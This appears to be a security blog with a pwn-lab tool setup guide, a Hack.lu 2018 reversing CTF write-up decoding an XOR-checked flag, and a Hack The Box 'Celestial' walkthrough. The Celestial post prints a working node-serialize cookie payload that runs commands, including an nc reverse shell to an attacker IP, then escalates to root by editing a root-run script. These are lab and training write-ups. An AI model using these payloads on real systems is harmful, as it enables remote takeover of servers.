Today’s post will cover a basic setup for a virtual environment to do some pwnable challenges. This is not the only setup and a lot of people will have better or other tools in their collection. But for me, it is a good base for most of the pwnables I do.

Disclaimer: I’m not a professional and therefore, some things could be wrong or could be done better. But let’s hope it is good enough! ;-)

Base System

As a host system, you can use whatever you want. Windows, Linux, macOS or something else will do the job.

Virtual Machines

Virtual machines are the best way to have a running system that can be compromised and later restored to an earlier state. Therefore, I recommend not running vulnerable code on your main system; build a virtual environment where you can run it safely. Moreover, it is very convenient to roll back your system if an executable misbehaves or the system gets damaged.

Virtualization Software:

  • VMWare Workstation (Pro), most students get a free copy
  • VirtualBox, free and open-source
  • Hyper-V, comes with Win10-Pro
  • …

OS Choice

Since most of the challenges are for Linux-based systems, I recommend setting up your custom virtual environment with a vanilla Linux like Ubuntu.

Tools

Tools are an essential part of your pwn-environment because you will need some! In the following, I will describe some useful tools which I often use.

ipython

A good interactive python shell with tab completion and highlighting.

gdb

Debugging in Linux is done with gdb and I will not cover each command here because there are many tutorials available.

gdb-Plugin: GEF

GEF is a great plugin for gdb which extends its debugging functionality. Other plugins such as pwndbg and PEDA do almost the same. I’ve decided that GEF is the right choice for me, but feel free to try each one yourself.
Some important commands we’ll use quite often:

  • Print memory
    eXamine memory: x/FMT ADDRESS.
    Example: x/10gx $rsp
    This command prints ten 8-byte values (g = giant word, 8 bytes; w = word, 4 bytes), starting from the address in rsp.
    More information at gdb Manuals

  • set follow-fork-mode child
    gdb follows a fork to debug the child process. It is essential for debugging a socket server which forks its process on each connection.
    Command: set follow-fork-mode child

  • search-pattern
    Easily find strings or your payload in the program’s memory.
    Command: search-pattern 'AAAAAAA'

  • vmmap
    Display a comprehensive layout of the virtual memory mapping.

More information at GEF-Docs.
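
If the x/FMT notation is new to you, it may help to see what a giant-word dump does with raw bytes. The following sketch imitates the output of x/4gx with the standard library; examine_giant is a hypothetical helper written for this post, the tab-separated layout only approximates what gdb prints, and the address and bytes are sample data.

```python
import struct


def examine_giant(memory, base, count):
    """Format `count` little-endian 8-byte values, two per line, similar to x/<count>gx."""
    lines = []
    for i in range(0, count, 2):
        in_line = min(2, count - i)
        words = struct.unpack_from("<%dQ" % in_line, memory, i * 8)
        rendered = "\t".join("0x%016x" % w for w in words)
        lines.append("0x%x:\t%s" % (base + i * 8, rendered))
    return lines


# Sample data: 8 C's followed by D's, placed at a sample stack address.
memory = b"C" * 8 + b"D" * 24
lines = examine_giant(memory, 0x7fffffffddb8, 4)
for line in lines:
    print(line)
```

The important detail is the little-endian interpretation: the first byte in memory ends up as the lowest byte of the printed value.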

strace / ltrace

For a basic overview of the binary, you can use strace and ltrace. strace traces the system calls and received signals of a given binary. ltrace does the same for library calls (e.g. read(…), fgets(…)).

Both tools are also great for reversing challenges because sometimes you might see some plaintext strings in function calls.

Pwntools

Pwntools is a great collection of tools/functions packed into a library for python. It is designed for rapid prototyping (which I can confirm) and it makes your exploit development for different tasks a lot easier.
A basic script could look like this:

from pwn import *

r = process("./challenge")
r.sendline(b"Hello")
print(r.recvline())
r.interactive()

A big advantage of this library is that the communication with processes, network sockets or other protocols like ssh uses the same interface. Therefore, you can easily develop your exploit against a local target with r = process("challenge") and later change one line to exploit the remote service with r = remote("192.168.1.42", 1337).

Binary Ninja

Binary Ninja is a really great and especially affordable reverse engineering tool. It comes with a good disassembler, medium level and low-level intermediate languages and a great python API interface to develop your plugins for binary ninja.
Further, you have some useful plugins already available at Binary Ninja Community Plugins.

Radare2

Radare2 is also a great tool for reversing, but it is kind of hard to begin with since it is a command-line tool.

IDA Free

Another possible disassembler is IDA Free. Since this is a demo version, the functionality is a little bit restricted, but for a beginner it is enough.

ROPgadget / Ropper

ROPgadget looks for gadgets in a binary to build a ROP chain and it supports different architectures and file formats.
Ropper does almost the same.

One Gadget

One Gadget allows you to spawn a shell with execve('/bin/sh', NULL, NULL) via libc in one shot! Therefore, you only need to leak the libc base address in the target’s memory and redirect code execution to the gadget.

Libc Database

Libc Database builds a database of libc offsets to identify used libc on the target machine. You have to be able to leak some libc pointers (e.g. via read primitive and GOT (Global Offset Table) addresses). A web-based variant is available at blukat.me.
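
The idea behind such a lookup is simple: libraries are mapped page-aligned, so the lowest 12 bits of a leaked address are identical to the lowest 12 bits of the symbol's offset inside the library, no matter where ASLR puts it. Here is a minimal sketch of that matching step; the database entries are invented for the example (only the 0x809c0 offset of puts corresponds to the libc 2.27 run shown in the Return to Libc post), and matching_libcs is not part of any real tool.

```python
def matching_libcs(leaks, database):
    """Return the names of all libcs whose symbol offsets agree with the leaks in the low 12 bits."""
    matches = []
    for name, offsets in database.items():
        if all(sym in offsets and (addr & 0xfff) == (offsets[sym] & 0xfff)
               for sym, addr in leaks.items()):
            matches.append(name)
    return matches


# Illustrative database; the two "made-up" entries are not real libc builds.
database = {
    "libc-2.27": {"puts": 0x809c0},
    "made-up-libc-A": {"puts": 0x12340},
    "made-up-libc-B": {"puts": 0x6f9c0},
}

leaks = {"puts": 0x7f97bd13f9c0}
candidates = matching_libcs(leaks, database)
print(candidates)
```

A single leak can match several candidates, as it does here, which is why leaking a second or third symbol is usually needed to narrow the result down to one libc.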


That’s all for the first post.

See you soon.

Hack.lu 2018: Baby Reverse

19 October 2018 at 00:00

Baby reverse was a beginner reversing challenge of this year’s hack.lu CTF. It was a great challenge for people who are completely new to reversing.

A really cool fact was that the challenge author provided a basic “todo” list to solve the challenge.

Hey there, future Reverser!

We created this small challenge to introduce you to reverse engineering. This task might _still_ take quite some time, but trust us, it will be very rewarding!
We sadly can't spoonfeed you, but we created a set of questions that you might want to answer yourself. We expect you to google on your own and find resources.

Sooo, lets get started!

- What kind of binary have you got infront of you? (Hint: "file" command)
- How can you disassemble the file? (objdump, gdb, radare...)
- Which programs are common debuggers?
- How can I use them? (we recommend gdb with the peda plugin)
- - how can I set breakpoints?
- - in which different ways can I step through programs?
- - how can I print/examine the content of memory/addresses
- what is inside registers? what's rax, rip, rsp?
- what is the linux syscall convention?
- - In which register is the second argument?
- - In which register is the syscall number?
- - - where can I find the syscall numbers on my own linux system?
- what happens at a call instruction?
- how can I compare strings in assembly?
- .. ask your teammates for more! annoy them if anything is unclear :P
- .. if you don't got any teammates, use IRC and say that it's about the baby challenge

There is a lot of work ahead of you, and maybe some sleepless nights with a lot of googling - but it will be worth it;-)!
We are certain that with a dedicated mind you can solve this task and from there on you'll be ready for a bright future!
Don't give up, we all have been there. Stick to it and you'll be rewarded =)

Therefore, a beginner could just follow the notes and try to figure out what the program does.

Analysis of the Program

The first command we use is file to find out which architecture the binary supports.

file chall
chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

We have a 64-bit binary and for that reason, we have 64-bit registers and we have to use registers for function calls. Next, we run the binary to see what it does. This is a very important step to get a general overview of a challenge.
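To see where the file command gets this information from, here is a minimal sketch that reads the same fields from the ELF header. The function name describe_elf and the tiny lookup tables are my own, and the sample header is synthetic, not taken from the challenge binary.

```python
import struct

ELF_CLASSES = {1: "32-bit", 2: "64-bit"}               # EI_CLASS, byte 4
ELF_DATA = {1: "LSB", 2: "MSB"}                        # EI_DATA, byte 5
ELF_MACHINES = {0x03: "Intel 80386", 0x3E: "x86-64"}   # small subset of e_machine


def describe_elf(header):
    """Summarise class, byte order and machine from the first 20 header bytes."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = header[4], header[5]
    byte_order = "<" if ei_data == 1 else ">"
    # e_machine is a 16-bit field at offset 18 of the ELF header.
    (e_machine,) = struct.unpack_from(byte_order + "H", header, 18)
    return "ELF {} {}, {}".format(
        ELF_CLASSES.get(ei_class, "unknown class"),
        ELF_DATA.get(ei_data, "unknown byte order"),
        ELF_MACHINES.get(e_machine, hex(e_machine)),
    )


# Synthetic header: magic, 64-bit, little-endian, version 1, padding,
# e_type = 2 (executable), e_machine = 0x3E (x86-64).
sample = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 2, 0x3E)
print(describe_elf(sample))
```

On a real file, passing the first 20 bytes (for example `open("chall", "rb").read(20)`) should work the same way.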

./chall
Welcome to this Chall!
Enter the Key to win: AAAA

Okay, we can enter some data and then the program exits.

Let’s open the challenge in gdb. In my case, I will use GEF as a gdb plugin instead of peda as recommended by the todo list.

gdb ./chall
gef> start          # runs until the program is loaded

Further, we can step through the program with si (stepi, step one instruction) to execute each instruction and follow function calls. If we don’t want to follow function calls, we can use ni (nexti, which steps over calls). While stepping through the program, we can observe that at some point the instructions repeat. That means we have entered a loop, and since the loop contains an XOR instruction, we can guess that this is some sort of “encoding” algorithm.

Let’s restart the program and find out where our input is stored. If we step through the code, we can observe two syscalls at the beginning. The first syscall prints the message Welcome to this Chall!. We can find the syscall number in the rax register and look the syscall number up (SyscallTable64Bit).

First syscall:
rax = 1 -> write
rsi = 0x4000d7  → "Welcome to this Chall! \nEnter the Key to win:"
It prints the message we saw earlier.

Second syscall:
rax = 0 -> read
rsi = 0x4000d7  → "Welcome to this Chall! \nEnter the Key to win:"
This means that we read (from stdin) to our buffer at rsi. So basically, we write new data in the message buffer.
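The register roles used here follow the x86-64 Linux syscall convention: rax holds the syscall number, and the arguments go into rdi, rsi, rdx, r10, r8 and r9 in that order. A small sketch that formats a register snapshot accordingly is shown below. The helper describe_syscall is hypothetical, and the rdi and rdx values are assumed for illustration; only rax and rsi come from the session above.

```python
SYSCALL_NAMES = {0: "read", 1: "write", 60: "exit"}  # small subset of the table
ARG_REGISTERS = ["rdi", "rsi", "rdx", "r10", "r8", "r9"]


def describe_syscall(regs, nargs=3):
    """Render a register snapshot as name(arg1, arg2, ...)."""
    number = regs["rax"]
    name = SYSCALL_NAMES.get(number, "syscall_{}".format(number))
    args = ", ".join(hex(regs.get(reg, 0)) for reg in ARG_REGISTERS[:nargs])
    return "{}({})".format(name, args)


# rdi (file descriptor) and rdx (length) are assumed values.
first = {"rax": 1, "rdi": 1, "rsi": 0x4000D7, "rdx": 0x2E}
second = {"rax": 0, "rdi": 0, "rsi": 0x4000D7, "rdx": 0x2E}

print(describe_syscall(first))
print(describe_syscall(second))
```

This also answers one of the todo-list questions: the second argument of a syscall lives in rsi, which is why the buffer address shows up there for both write and read.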

Afterward, we enter the following loop:

0x400098                  movzx  rdi, BYTE PTR [rsi+0x1]
0x40009d                  xor    QWORD PTR [rsi], rdi
0x4000a0                  inc    rsi
0x4000a3                  dec    rdx
0x4000a6                  jne    0x400098

The loop iterates over our message buffer (with our input) and XORs the current indexed character with the next one in the buffer and writes the result to the currently indexed character. Let the buffer be ABCD.
The algorithm will perform the following operations:

A = 0x41
B = 0x42
C = 0x43
D = 0x44
buffer = {0x41, 0x42, 0x43, 0x44}
i = index (incremented by the algorithm)
buffer[i] = buffer[i] ^ buffer[i+1] ( = 0x41^0x42 = 0x03 )
i = i + 1
buffer[i] = buffer[i] ^ buffer[i+1] ( = 0x42^0x43 = 0x01 )
...

Further, we can observe a loop index (rdx) which is decremented in each iteration. If rdx becomes zero, the loop exits at jne 0x400098
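The loop can be re-implemented in a few lines to experiment with it outside the debugger. This is a sketch under two assumptions of mine: the counter in rdx equals the input length, and the byte following the input is zero. Since rdi is zero-extended from a single byte, the XOR only changes the lowest byte at [rsi], so a byte-wise model is sufficient.

```python
def xor_encode(data):
    """Model of the loop: buffer[i] ^= buffer[i + 1] for each input byte."""
    buf = bytearray(data) + b"\x00"  # assumed zero byte after the input
    for i in range(len(data)):       # rdx counts down once per iteration
        buf[i] ^= buf[i + 1]         # buf[i + 1] is still unmodified here
    return bytes(buf[:len(data)])


encoded = xor_encode(b"ABCD")
print(encoded.hex())
```

For the input ABCD, the first two bytes come out as 0x03 and 0x01, matching the manual calculation above. Because each step reads the next byte before it is modified, every output byte depends only on two neighbouring input bytes.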

After the loop ends we can see a comparison between two buffers: repz cmps BYTE PTR ds:[rsi], BYTE PTR es:[rdi]. If we recall the algorithm, we know that our buffer is referenced by rsi and therefore rdi should be another buffer. Since these two buffers should be equal, we can guess that this buffer contains the “encoded” flag.

Developing a Solution

To solve this problem, we first step in gdb until the comparison and copy the content of the other buffer.

 gef➤  x/10gx $rdi
 0x40010c:    0x261838221c060d0a    0x2c42591c2b390f36
 0x40011c:    0x392d171c262c1a36    0x0709382b07014357
 0x40012c:    0x392d17131317011a    0x2e007d5c46060d0a
 0x40013c:    0x6261747274736873    0x0000747865742e00
 0x40014c:    0x0000000000000000    0x0000000000000000

Next, we have to reverse the byte order of each giant word because gdb prints the values as little-endian integers. Here is a really quick and dirty algorithm that reverses each hex string and also concatenates the parts into one string. (There is certainly a better solution, e.g. printing the data in gdb with the right format.)

str1 = "261838221c060d0a"
str2 = "2c42591c2b390f36"
str3 = "392d171c262c1a36"
str4 = "0709382b07014357"
str5 = "392d17131317011a"
str6 = "2e007d5c46060d0a"
str7 = "6261747274736873"
str8 = "0000747865742e00"

words = [str1, str2, str3, str4, str5, str6, str7, str8]
goal = ""

for word in words: # loop through the giant words of the dump
    for n in range(len(word), 0, -2): # walk the hex string backwards, one byte (two hex digits) at a time
        goal += word[n-2:n]

print(goal)
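As a possible cleaner alternative, the struct module can do the byte swapping. The sketch below uses only the first two giant words from the dump above; the variable names are mine.

```python
import struct

# The first two giant words from the gdb dump, as integers.
giant_words = [0x261838221C060D0A, 0x2C42591C2B390F36]

# "<Q" packs each value as an unsigned 64-bit little-endian integer,
# which restores the byte order as it sits in memory.
memory = b"".join(struct.pack("<Q", word) for word in giant_words)

print(memory.hex())
```

Alternatively, dumping single bytes in gdb (for example with x/80bx $rdi) prints them in memory order, so no swapping should be needed at all.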

Next, we want to reverse the XOR operation. Since we know that the flag might start with “flag”, we have some known plaintext. In our case, 1 byte/character is enough to reverse the XOR operation. Let the first character be p[0] = 'f' and the first ciphertext byte be c[0] = 0x0a; then we get the next plaintext character p[1] with chr(0x0a^ord('f')) = 'l'. To get the whole flag, we just repeat the XOR operation on p[i] and c[i] to get p[i+1].

plain = "fl" # known plaintext: the flag starts with 'flag'
counter = 1
goal = bytes.fromhex(goal) # hex string -> raw bytes (Python 3)
for byte in goal[1:]:
    plain += chr(byte ^ ord(plain[counter])) # p[i+1] = c[i] ^ p[i]
    counter += 1
print(plain)
# flag{Yay_if_th1s_is_yer_f1rst_gnisrever_flag!}...non printables

That’s it.

Hack The Box: Celestial

26 August 2018 at 00:00

Today, we are going to do Celestial of Hack the Box.

Enumeration & Exploitation

First, we perform an initial nmap scan to find open ports.

# Nmap 7.70 scan initiated Mon Jul 23 06:58:10 2018 as: nmap -sV -sC -oA init 10.10.10.85
Nmap scan report for 10.10.10.85
Host is up (0.023s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 23 06:58:38 2018 -- 1 IP address (1 host up) scanned in 28.13 seconds

If we visit the page we are confronted with a 404 error page. But if we reload the page we can see a page with content: Hey Dummy 2 + 2 is 22.

Let’s take a closer look:

  • First open Burp Suite and configure your browser of choice to use 127.0.0.1:8080 (Burp’s default listener) as a proxy
  • Turn on intercept
  • Visit the website with cleared cache and cookies

We can see that on the first visit a cookie is set:

Set-Cookie: profile=eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D; Max-Age=900; Path=/;

The profile cookie looks very interesting because it ends in %3D%3D, the URL-encoded form of ==, and trailing = padding is a strong indicator of base64 encoding. URL-decode the value, decode it as base64, and you’ll get a JSON object:

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}
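The decoding can also be done outside of Burp. A minimal sketch using only the Python standard library is shown below; the function name decode_profile is my own, and the cookie value is the one from the response above.

```python
import base64
import json
from urllib.parse import unquote

cookie_value = (
    "eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUg"
    "RHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D"
)


def decode_profile(value):
    """URL-decode, base64-decode and JSON-parse the profile cookie."""
    raw = base64.b64decode(unquote(value))  # %3D%3D becomes == first
    return json.loads(raw.decode("utf-8"))


profile = decode_profile(cookie_value)
print(profile)
```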

If you remember the content of the page on our second visit (after the cookie is set), we can guess that the num field is the value used for the ‘computation’ shown above. Next, we change the num field to another value like 3, base64-encode the modified JSON object again, and replace the cookie in the HTTP header with the Burp Repeater. This changes the output:

Hey Dummy 3 + 3 is 33
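Re-encoding a modified profile by hand gets tedious when trying several values, so a small helper can build the cookie value. This is only a sketch: encode_profile is a hypothetical helper, and the compact JSON separators are chosen to mimic the format of the original cookie.

```python
import base64
import json
from urllib.parse import quote, unquote


def encode_profile(profile):
    """Serialize to compact JSON, base64-encode, then URL-encode the result."""
    raw = json.dumps(profile, separators=(",", ":")).encode("utf-8")
    # safe="" makes sure that '=', '+' and '/' are percent-encoded as well.
    return quote(base64.b64encode(raw).decode("ascii"), safe="")


modified = {
    "username": "Dummy",
    "country": "Idk Probably Somewhere Dumb",
    "city": "Lametown",
    "num": "3",
}

new_cookie = encode_profile(modified)
print("Cookie: profile=" + new_cookie)
```

The printed header line can be pasted into the request in the Burp Repeater.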

Let’s send some special characters to the application (e.g. 3'>)

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>SyntaxError: Unexpected string<br> &nbsp; &nbsp;at /home/sun/server.js:13:29<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at next (/home/sun/node_modules/express/lib/router/route.js:137:13)<br> &nbsp; &nbsp;at Route.dispatch (/home/sun/node_modules/express/lib/router/route.js:112:3)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at /home/sun/node_modules/express/lib/router/index.js:281:22<br> &nbsp; &nbsp;at Function.process_params (/home/sun/node_modules/express/lib/router/index.js:335:12)<br> &nbsp; &nbsp;at next (/home/sun/node_modules/express/lib/router/index.js:275:10)<br> &nbsp; &nbsp;at cookieParser (/home/sun/node_modules/cookie-parser/index.js:70:5)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/home/sun/node_modules/express/lib/router/layer.js:95:5)</pre>
</body>
</html>

Ok, we get a syntax error which means our input is parsed. Moreover, we have leaked some internal paths of the target.

Some research on Node.js exploitation leads us to a known weakness in an unserialize function. Digging deeper, we find that we can execute a command like this [External Tutorial]:

First we open a netcat listener on our machine with nc -lvvp 1234 and then we can execute a command with

{"username":"Admin","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"_$$ND_FUNC$$_function (){\nexec=require('child_process').exec;\nexec('echo 1234 | nc 10.10.15.XX 1234');\nreturn 1\n}()"}

If it was successful, we can change our command to something more useful:

{"username":"Admin","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"_$$ND_FUNC$$_function (){\nexec=require('child_process').exec;\nexec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.XX 1234 >/tmp/f');\nreturn 1\n}()"}

Yes, got a shell!

nc -lvvp 1234
listening on [any] 1234 ...
10.10.10.85: inverse host lookup failed: Unknown host
connect to [10.10.14.232] from (UNKNOWN) [10.10.10.85] 41274
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(sun) gid=1000(sun) groups=1000(sun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

If we look at server.js in the home directory of the user, we can find the unserialize function and an eval expression which will execute our commands:

//...
var str = new Buffer(req.cookies.profile, 'base64').toString();
var obj = serialize.unserialize(str);
//...
var sum = eval(obj.num + obj.num);
res.send("Hey " + obj.username + " " + obj.num + " + " + obj.num + " is " + sum);
//...
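This snippet also explains the odd arithmetic on the page: num is a string, so obj.num + obj.num concatenates "2" and "2" into "22" before eval runs. The effect can be reproduced in Python, used here purely as an analogy for the JavaScript behaviour; fake_sum is a made-up name.

```python
def fake_sum(num):
    """Mimic eval(obj.num + obj.num) when num is a string."""
    return eval(num + num)  # string concatenation happens before evaluation


print(fake_sum("2"))  # "2" + "2" is the expression "22"

# Special characters end up inside the evaluated expression,
# which is why the earlier test input produced a syntax error.
try:
    fake_sum("3'>")
    outcome = "evaluated"
except SyntaxError:
    outcome = "SyntaxError"
print(outcome)
```

Anything that is a valid expression gets executed, which is the core of the problem with calling eval on cookie data.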

Privilege Escalation

Besides the user.txt, which contains the flag of the user account, we see a script called script.py with one line of python code print "Script is running...". If we take a look at the home directory we can find a root-owned file called output.txt which contains the string printed by the script above.

So, we can guess that the root user periodically executes the script of the user sun. Therefore, we can easily modify script.py to get a shell or simply leak the root.txt

Replace the content of script.py with our python code:

with open('/root/root.txt', 'rb') as f:
  print f.read()

After a few minutes, we can read the output.txt and we get the root flag.

Important: Please put the original code in script.py and remove the content of output.txt to avoid spoilers.


Happy Hacking! =)
